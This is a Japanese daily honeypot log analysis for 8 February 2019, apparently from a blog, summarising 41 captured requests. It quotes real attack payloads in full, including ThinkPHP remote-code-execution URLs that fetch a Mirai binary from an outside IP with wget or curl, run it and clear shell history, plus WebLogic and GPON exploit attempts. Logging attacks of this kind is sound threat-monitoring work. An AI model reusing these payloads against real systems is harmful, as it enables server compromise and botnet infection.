ハニーポットのログ分析(2019/02/08)
WOWhoneypotの2019/02/08(金) (運用247日目)の簡易分析です。
本日の総アクセス件数は 41件です。送信元IPは36IPでした。
本日の主なアクセスは以下です。
・ThinkPHPの脆弱性を突いた攻撃:2件
→User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64
本日のドメイン名でのアクセスは以下です。
3 GET /
1 GET /robots.txt
本日のハンティングログは以下です。どちらもThinkPHPを狙ったもので同一IPからです。
1 2019-02-08 wget hxxp://104.248.211[.]25/V1/saskia.x86
1 2019-02-08 curl -O hxxp://104.248.211[.]25/V1/saskia.x86
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
34 | 2019-02-08 | アクセス | GET / |
1 | 2019-02-08 | Weblogicの脆弱性(CVE-2017-10271)を突く攻撃 | POST /wls-wsat/CoordinatorPortType |
1 | 2019-02-08 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
1 | 2019-02-08 | クローリング | GET /robots.txt |
1 | 2019-02-08 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=cd%20/tmp;wget%20hxxp://104.248.211.25/V1/saskia.x86;cat%20saskia.x86%20%3E%20Mira01;chmod%20777%20Mira01;./Mira01%20thinkphp;%20rm%20rf%20Mira01%20saskia.x86;%20history%20-c |
1 | 2019-02-08 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=cd%20/tmp;curl%20-O%20hxxp://104.248.211.25/V1/saskia.x86;cat%20saskia.x86%20%3E%20Mira01;chmod%20777%20Mira01;./Mira01%20thinkphp;%20rm%20rf%20Mira01%20saskia.x86;%20history%20-c |
1 | 2019-02-08 | phpMyAdminの調査 | GET /phpmyadmin/ |
1 | 2019-02-08 | 不明 | GET /6DC23FBA2D7BD8D5B2D3D5802BD55193.php |
以上です。